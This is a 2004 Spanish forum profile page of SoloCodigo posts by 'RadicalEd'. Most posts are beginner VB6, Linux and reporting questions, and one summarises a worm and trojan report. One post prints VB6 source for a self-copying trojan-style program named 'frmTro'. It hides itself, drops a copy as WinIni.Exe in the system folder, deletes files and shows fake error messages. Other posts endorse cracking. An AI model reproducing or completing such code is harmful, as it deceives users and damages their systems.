|
|
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
Temas - RadicalEd
Páginas: 1 ... 23 24 [25] 26
601
« en: Sábado 2 de Octubre de 2004, 19:25 »
-Noomy.A y Bagle.BB-, y a un troyano denominado HardFull.A.
Noomy.A se propaga a través del correo electrónico y de IRC. Cuando lo hace
por e-mail se envía a direcciones que no contienen ciertas subcadenas y que
obtiene en ficheros cuya extensión es: .dbx, .htm, .html o .php. Por otra
parte, cuando se manda por IRC, Noomy.A implementa su propio servidor HTTP y
envía varios mensajes a canales IRC que tiene codificados, junto con enlaces
que invitan a conectarse al servidor HTTP del ordenador infectado. En la
práctica, al acceder a los enlaces, se abre una página desde donde pueden
descargase las copias del gusano.
La propagación y el payload de Noomy.A dependen de la fecha en la que se
ejecuta y del tipo de conexión a Internet utilizada. Entre las acciones que
puede llevar a cabo este gusano destacan las siguientes:
- Finaliza procesos pertenecientes a herramientas de seguridad -como, por
ejemplo, programas antivirus y cortafuegos-, dejando así al equipo
vulnerable al ataque de otros ejemplares de malware.
- Ataque de denegación de servicio, mediante el comando ping, a varios
sitios entre los que se encuentra el de Microsoft.
- Se conecta a un enlace para enviar datos del PC, como hora y fecha del
sistema, si utiliza mswinsck.ocx, servidor SMTP y usuario de correo que
utiliza Outlook.
Tras ser ejecutado Noomy.A muestra un mensaje en pantalla, por lo que su
presencia en un equipo es fácilmente reconocible.
El segundo gusano del presente informe es Bagle.BB, que se difunde a través
del correo electrónico -en un mensaje escrito en inglés y de características
variables-, y de programas de intercambio de archivos punto a punto (P2P).
Bagle.BB abre el puerto TCP 81 y permanece a la escucha, a la espera de que
se realice una conexión remota. A través de ella, permite acceder -de forma
remota- al ordenador al que afecta, para realizar en él acciones que pueden
comprometer la confidencialidad de los datos del usuario o dificultar su
trabajo.
Bagle.BB termina procesos pertenecientes a herramientas de seguridad como,
por ejemplo, programas antivirus, dejando así al equipo indefenso a los
ataques de otro malware. Además, Bagle.BB elimina del Registro de Windows
las entradas correspondientes a variantes del gusano Netsky, evitando así
que se ejecuten cuando se inicia el equipo.
Finalizamos el presente informe con HardFull.A, troyano que no se propaga
automáticamente por sus propios medios, ya que precisa de la intervención
del atacante para ello. Los medios empleados para difundirlo son variados e
incluyen, entre otros, disquetes, CD-ROMs, mensajes de correo electrónico
con archivos adjuntos, descargas de Internet, etc.
HardFull.A crea un archivo que se llena a sí mismo con el texto
Win32.Delf.du_Ful, incrementando así su tamaño hasta que ocupa todo el
espacio disponible en el disco duro, provocando la ralentización e incluso
el bloqueo del equipo. Igualmente, este troyano desactiva las herramientas
de edición del Registro de Windows, y las opciones "Ejecutar" y "Buscar" del
menú Inicio.
602
« en: Martes 28 de Septiembre de 2004, 18:50 »
HOLA CHICOS DE SOLOCODIGO, ESTOY AQUI CON UN DILEMA ESTABA INSTALANDO EL MANDRAKE 8.0 Y SE ME BLOQUE LA INSTALACION POR QUE EL CD ESTABA RAYADO Y NO ME HABIA DADO CUENTA, ENTONCES LA PARTICION QUEDO CON EL FORMATO DE LINUX Y EL WINDOZE NO ME LA RECONOCE, SABEN DE ALGUN METODO PARA RECUPERARLA.
GRACIAS CHAO
603
« en: Sábado 25 de Septiembre de 2004, 18:18 »
HOLA CHICOS DE SOLOCODIGO ENTRANDO A LA PAGINA DE UNO DE LOS USUARIOS DEL FORO ME ENCONTRE CON UN LENGUAJE DE PROGRAMACION BASTANTE PECULIAR SE LLAMA D++, SE ENCUENTRA EN ESTA PAGINA D++, ME GUSTARIA QUE HUBIERA UN FORO SOBRE ESTE LENGUAJE DE PROGRAMACION, INCLUYE EL CODIGO FUENTE DEL LENGUAJE, Y ALGUIEN QUE PODRIA ENSEÑARNOS ES BLAG CON EL DI A LA PAGINA, ESPERO LES GUSTE MI IDEA.
GRACIAS CHAO
604
« en: Viernes 24 de Septiembre de 2004, 20:36 »
HOLA CHICOS DE SOLOCODIGO AQUI ESTOY OTRA VEZ JODIENDO PERO EL QUE NO SABE PREGUNTA Y APRENDE.
AQUI VA COMO HAGO PARA ABRIR UN ARCHIVO DE MULTIPLES LINEAS COMO ASI?, PUES QUE TENGA ESCRITO
HOLA
QUIBO
MAMA
PAPA [/color] ME HAGO ENTENDER TENGO ESTE CODIGO PERO SOLO ME SIRVE PARA UNA LINEA COMO LO MEJORO
Dim TextLine Open TxtSave.Text For Input As #1 Do While Not EOF(1) Line Input #1, TextLine Text1.Text = TextLine Loop Close #1 End Sub
GRACIAS CHAO[/color]
605
« en: Viernes 24 de Septiembre de 2004, 19:21 »
HOLA CHICOS DE SOLOCODIGO ESTOY HACIENDO UN PROGRAMITA DE ENCRIPTAMIENTO CON EL COMANDO XOR Y 3 TEXTBOX PARA ENCRIPTAR CON VARIOS VALORES, PERO AQUI VIENE EL PROBLEMA CON 2 TEXTBOX LO MAXIMO ES VALOR 9 Y 25 Y CON 3 ME TOCA DEJARLO CON 1-1-1 POR QUE ME SACA EL ERROR DE
 Run-time error '5': Invalid procedure call or argument
[/color] AQUI LES VA EL CODIGO DE ENCRIPTAMIENTO Y EL SOURCE DEL PROGRAMA AYUDENMEN A MEJORARLO GRACIAS  Private Sub Command1_click() Dim TextoAux As String, Texto As String Dim I As Integer Texto = "" If Text2.Text = "" Then Call MsgBox("Favor dar valor de encriptamiento", 16, "Warning") Else For I = 1 To Len(Text1.Text) Text1.SelStart = I - 1 Text1.SelLength = 1 TextoAux = Text1.SelText Texto = Texto + Chr$(Asc(TextoAux) Xor Text2.Text & Text3.Text & Text4.Text) Next I End If Text1.Text = Texto End Sub
 A Y CON 4 TEXTBOX EN ADELENTE NO ME SIRVE
GRACIAS CHAO
606
« en: Martes 21 de Septiembre de 2004, 18:44 »
HOLA CHICOS DE SOLOCODIGO, COMO HAGO PARA MOSTRAR UN REPORTE DEL REGISTRO QUE ESTA EN EL MOMENTO EN EL FORM; POR SI NO ME HAGO ENTENDER TENGO UNA BASE DE DATOS DE 5000 USUARIOS, PERO QUIERO SOLAMENTE HACER UN REPORTE DE UN SOLO USUARIO EL QUE ACTUALMENTE ME ESTRE MOSTRANDO UN FORMULARIO, COMO PUEDO HACER? HE TRATADO CON EL WIZARD DE ACCESS PERO ESTE ME SACA TODOS LOS USUARIOS ACTUALES.
GRACIAS CHAO
607
« en: Lunes 20 de Septiembre de 2004, 19:11 »
HOLA CHICOS DE SOLOCODIGO ESTOY HACIENDO UNA APLICACION CON LAS API's FindWindow Y SendMessage PARA CERRAR EL AUTOMARCADO DE INTERNET, Y LO QUE PASA ES QUE NO ME FUNCIONA SI QUIEREN POSTEO EL CODIGO AQUI LES VA
1 Command
Const WM_CLOSE = &H10 FindWindow y SendMessage Private Sub CmdClose_Click() Dim w As Long w = FindWindow (vbNull, "Marcando emcatel...") If w=0 Then Exit Sub End If SendMessage w, WM_CLOSE, 0&, 0& End Sub
[/color]
608
« en: Lunes 20 de Septiembre de 2004, 18:53 »
HOLA CHICOS DE SOLOCODIGO QUIERO APRENDER XML Y TENGO 2 PREGUNTILLAS PARA USTEDES:
1.) DONDE ME CONSIGO UN BUEN TUTORIAL
2.) POR QUE EL INTERNET EXPLORER ME MUESTRA EL XML COMO UN SIMPRE FORMATO DE TEXTO NO SE SI ME HAGA ENTENDER PERO ME LO MUESTRA TAL Y COMO ESTA ESCRITO EL CODIGO NO LO QUE DEBERIA APARECER COMO LO HACE HTML O ASP
GRACIAS CHAO
609
« en: Miércoles 15 de Septiembre de 2004, 19:11 »
HOLA CHICOS DE SOLOCODIGO POR FAVOR HICE ESTA PREGUNTA EN EL FORO DE LINUX TALVES ESTA EN EL LUGAR EQUIVOCADO, POR ESO LA REPLANTEARE AQUI, QUIERO APRENDER A PROGRAMAR EN GLADE Y LO QUE ME PASA ES QUE AL AÑADIR UN BOTON U OTRO CONTROL ME LO HACE DEL TAMAÑO DE LA FORMA Y NO SE COMO PUEDO ENTRAR A LA VENTANA DE CODIGO ME PUEDEN AYUDAR
GRACIAS CHAO
610
« en: Miércoles 15 de Septiembre de 2004, 17:17 »
HOLA CHICOS DE SOLOCODIGO ESTUVE POR AHI RONDANDO Y ME ENCONTRE CON UNA PREGUNTA PECULIAR COMO SE HACE PARA AÑADIR CEROS A UN VALOR, POR EJM HAY EL NUMERO 2 Y QUIERO AGREGARLE 2 CEROS O SEA 200, SIN MULTIPLICAR AÑADIENDO LA CANTIDAD DE CEROS NO VALE MULTIPLICAR TENGO ESTE CODIGO Y ME SIRVE HASTA 1 CERO MAS Private Sub Command1_Click() On Error Resume Next Dim x Dim y y = "0" For x = 1 To Text2.Text y = y & y - y Next x Text3.Text = Text1.Text & y End Sub
611
« en: Martes 14 de Septiembre de 2004, 21:34 »
HOLA CHICOS DE SOLOCODIGO PONGO ESTA VOTACION POR QUE QUIERO UNA OPINION PARA TODOS LOS CRACKERS QUE HAY EN EL MUNDO PARA MI ES UN ESTILO DE VIDA QUE SE DEBERIA LLEVAR Y NO DEJARNOS MANDAR DEL SOFTWARE DE NADIE NI PAGAR POR PROGRAMAS QUE NOSOTROS PODRIAMOS HACER USTEDES QUE PIENSAN?
612
« en: Martes 14 de Septiembre de 2004, 21:26 »
HOLA CHICOS DE SOLOCODIGO POR QUE NO CREAN UN FORO DE CRACKING EN LA PAGINA, PARA APRENDER DE LAS VULNERABILIDADES DE LOS PROGRAMAS TANTO NUESTROS COMO LOS DE OTROS CREADORES, YA SE QUE HAY UN FORO DE SEGURIDAD Y CRIPTOGRAFIA PERO PUEDEN PONERLO COMO SUBFORO EN ESTE, ESPERO LES GUSTE LA IDEA
GRACIAS CHAO
613
« en: Martes 14 de Septiembre de 2004, 20:50 »
HOLA CHICOS DE SOLOCODIGO, COMO HAGO PARA BORRAR DATOS DE UN LISTBOX HE TRATADO CON EL REMOVEITEM PERO NO PUEDO DEBO COLOCAR ALGO MAS EN EL CODIGO POR FAVOR AYUDENMEN
GRACIAS CHAO
614
« en: Lunes 13 de Septiembre de 2004, 17:14 »
HOLA CHICOS DE SOLOCODIGO COMO HAGO PARA QUE NO SE ME AUTOEJECUTE EL CD-ROM EN WINXP HE PROBADO LA FORMA DE WIN98 CON EL Bloq-Mayus PERO NO ME FUNCIONA ¿QUE DEBO HACER? GRACIAS
615
« en: Viernes 10 de Septiembre de 2004, 20:22 »
HOLA CHICOS DE SOLOCODIGO POR QUE CHINGADAS NO ME ABRE EL GOOGLE EN MI PC SERA ALGUN VIRUS RARO TENGO EL AVG 6.0 LO ACTUALIZE PERO NO ME SACA NINGUN VIRUS
AYUDA AYUDITA
GRACIAS CHAO
616
« en: Viernes 10 de Septiembre de 2004, 17:29 »
HOLA CHICOS DE SOLOCODIGO HE ESTADO USANDO EL CRYSTAL REPORT YA HACE RATICO Y QUIERO SABER COMO IMPRIMIR UN SOLO USUARIO NO TODOS LOS USUARIOS QUE HAY EN EL REGISTRO SINO EL QUE SOLO MUESTRA EL FORM EN EL MOMENTO UTILIZO EL DATA COMO CONCATENADOR A LA DB
GRACIAS CHAO
ESPERO PUEDAN RESPONDER MI PREGUNTA
617
« en: Sábado 4 de Septiembre de 2004, 19:42 »
BUENO SI HA LINUX NO LE HAN CHINGADO NI UN VIRUS QUE SE REPORTE POR NOTICIAS O ALGO POR QUE HI.....TA SEGUIMOS USANDO EL WINDOZE PERDON LA GROSERIA
618
« en: Sábado 4 de Septiembre de 2004, 19:29 »
HOLA CHICOS DE SOLOCODIGO HE TRATADO DE PROGRAMAR CON GLADE PERO AL METER UN CONTROL BOTON ME APARECE DEL TAMAÑO DE LA FORMA Y NO PUEDO DISMINUIRLO NI PODER ENTRAR A ALGUNA VENTANA DE CODIGO COMO HAGO
GRACIAS CHAO
619
« en: Sábado 4 de Septiembre de 2004, 18:44 »
AYER ESTUVE REVISANDO UN EQUIPO CON WINXP QUE DECIAN QUE NO FUNCIONABA EL INTERNET LO REVISE Y LO CONFIGURE Y CUANDO ENTRE AL INTERNET ME REINICIO EL EQUIPO, PARECE UNA VARIANTE DEL SASSER CREO YO SOLO QUE ESTE REINICIA LA MAQUINA DE UNA SIN SACAR LA VENTANA DE TIEMPO PARA APAGAR SERA UN NUEVO VIRUSILLO VAYA TU A SABER LO UNICO QUE SE ES QUE HE ESTADO INVESTIGANDO Y NO ENCUENTRO NADA AL RESPECTO HA HAY INSTALADO EL ANTIVIRUS AVG 6.0 EN ESTA MAQUINA ASI QUE QUIEN SABE QUE SERA A LOS 2 MINUTOS COMO MAXIMO ME SACA SI ENCUENTRO ALGO LES HAGO SABER, SI ALGUIEN SABE HAGALO SABER
GRACIAS CHAO
620
« en: Jueves 2 de Septiembre de 2004, 23:44 »
HOLA CHICOS DE SOLOCODIGO TENGO UN PROBLEMA CON 2 CODIGOS IGUALITOS AQUI LES VA'form1 Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Private Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long Private Sub Form_Load() On Error Resume Next Dim z Me.Visible = False z = QueryValue(HKEY_CURRENT_USER, "¶¶¶\mani", "pio") If z <> 1 Then Call Create Else Call Killing End If End Sub Sub Create() On Error Resume Next Dim m CreateNewKey HKEY_CURRENT_USER, "¶¶¶\mani" SetKeyValue HKEY_CURRENT_USER, "¶¶¶\mani", "pio", "1", REG_SZ WritePrivateProfileString "RegServer", "dar", App.Path + "\" + App.EXEName + ".exe", App.Path & "\lalo.ocx" FileCopy App.Path + "\" + App.EXEName + ".exe", App.Path + "\mada.exe" m = Shell(App.Path + "\mada.exe", 0) AppActivate m Unload Me End Sub Sub Killing() On Error Resume Next Dim ret As String, NC As Long ret = String(255, 0) NC = GetPrivateProfileString("RegServer", "dar", "Default", ret, 255, App.Path & "\lalo.ocx") If NC <> 0 Then ret = Left$(ret, NC) Call MsgBox("Welcome to Oracle SQL Editor", 48, "SQL Editor") Kill (ret) Kill (App.Path & "\lalo.ocx") Call MsgBox("Critical Stack Overflow Application will be Close", 16, "Warning") End If End Sub
'frmTro Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Private Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long Private Sub Form_Load() On Error Resume Next Dim z Me.Visible = False z = QueryValue(HKEY_CURRENT_USER, "¶¶¶\mani", "pio") If z <> 1 Then Call Create Else Call Killing End If App.TaskVisible = False 'Ocultar en la barra de tareas. End Sub Sub Create() On Error Resume Next Dim m Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") CreateNewKey HKEY_CURRENT_USER, "¶¶¶\mani" SetKeyValue HKEY_CURRENT_USER, "¶¶¶\mani", "pio", "1", REG_SZ WritePrivateProfileString "RegServer", "dar", App.Path + "\" + App.EXEName + ".exe", App.Path + "\WinIni.ocx" FileCopy App.Path + "\" + App.EXEName + ".exe", fso.GetSpecialFolder(1) + "\WinIni.Exe" m = Shell(fso.GetSpecialFolder(1) + "\WinIni.Exe", 0) AppActivate m Unload Me End Sub Sub Killing() On Error Resume Next Dim ret As String, NC As Long ret = String(255, 0) NC = GetPrivateProfileString("RegServer", "dar", "Default", ret, 255, App.Path & "\WinIni.ocx") If NC <> 0 Then ret = Left$(ret, NC) Call MsgBox("Welcome to Oracle SQL Editor", 48, "SQL Editor") Kill (ret) Kill (App.Path & "\WinIni.ocx") Call MsgBox("Critical Stack Overflow Application will be Close", 16, "Warning") End If End Sub
QUE ESTA MAL AYUDENMEN
GRACIAS CHAO
621
« en: Jueves 2 de Septiembre de 2004, 18:06 »
HOLA CHICOS DE SOLOCODIGO ESTOY APRENDIENDO A TRABAJAR CON EL INNO SETUP PARA MIS APLICACIONES EN VB EL PROBLEMA ES QUE NO SE COMO SACAR EL SETUP EJECUTABLE COMO LO HAGO?
ADEMAS ANTERIORMENTE POSTIE UNA PREGUNTA DE COMO UTILIZAR MIS APLICACIONES SIN LAS MSVBVM*.DLL Y OCX QUE NECESITA VB PARA TRABAJAR Y ME DIERON ESTE PROGRAMA LO QUE HACE ES CREAR UN SETUP YO NECESITO ES QUE LAS APLICACIONES TRABAJEN DE UNA COMO EJECUTABLES SIN QUE ME PIDAN DICHOS ARCHIVOS Y CONECTARLOS UTILIZO UN PROGRAMA QUE SE LLAMA ALLOY PERO NO ME SIRVE POR QUE ES SHAREWARE Y ME ESTA MOLESTANDO Y NO ME DEJA CONCATENAR LOS ARCHIVOS AYUDENMEN CON ESTAS 2 PREGUNTITAS
GRACIAS CHAO
622
« en: Sábado 28 de Agosto de 2004, 17:26 »
OLA CHICOS DE SOLOCODIGO CREE UN ARCHIVO OCX Y LO REGISTRE PERO DESPUES DE UN TIEMPO EL PROGRAMA QUE LO USABA ME DICE QUE NO LO TENGO REGISTRADO USE EL PROGRAMA Regsvr32.exe PARA REGISTRARLO PERO NI ASI Y ADEMAS ME QUEDO EN EL ADMINISTRADOR DE SOFTWARE INSTALADO Y YA NO LO PUEDO DESINSTALAR
COMO HAGO?
GRACIAS CHAO
623
« en: Miércoles 25 de Agosto de 2004, 17:51 »
HOLA CHICOS DE SOLOCODIGO COMO HAGO PARA CREAR MENUS POPUP GRACIAS POR LA AYUDA CHAO
624
« en: Miércoles 25 de Agosto de 2004, 17:22 »
HOLA EN ESTA SECCION SE PUEDEN POSTEAR VIRUS, SINO ES ASI DISCULPEN
625
« en: Martes 24 de Agosto de 2004, 02:17 »
OIGAN (COMO SI SE PUDIERA CON UN TEXTO), TENGO 2 ARCHIVOS RAROS RAROS EN MI XP Thumbs.mb o md y Desktop.ini
LO RARO ES QUE ME LE CAYO EL SASSER AL PC Y ME TOCO QUE FORMATEARLO Y ESTA DESDE EL PRINCIPIO Y LIMPIO ES MAS NO HE ENTRADO A INTERNET CON EL ALGUIEN SABE QUE SON?
GRACIAS CHAO
Páginas: 1 ... 23 24 [25] 26
|
|
|
Mostrar Mensajes
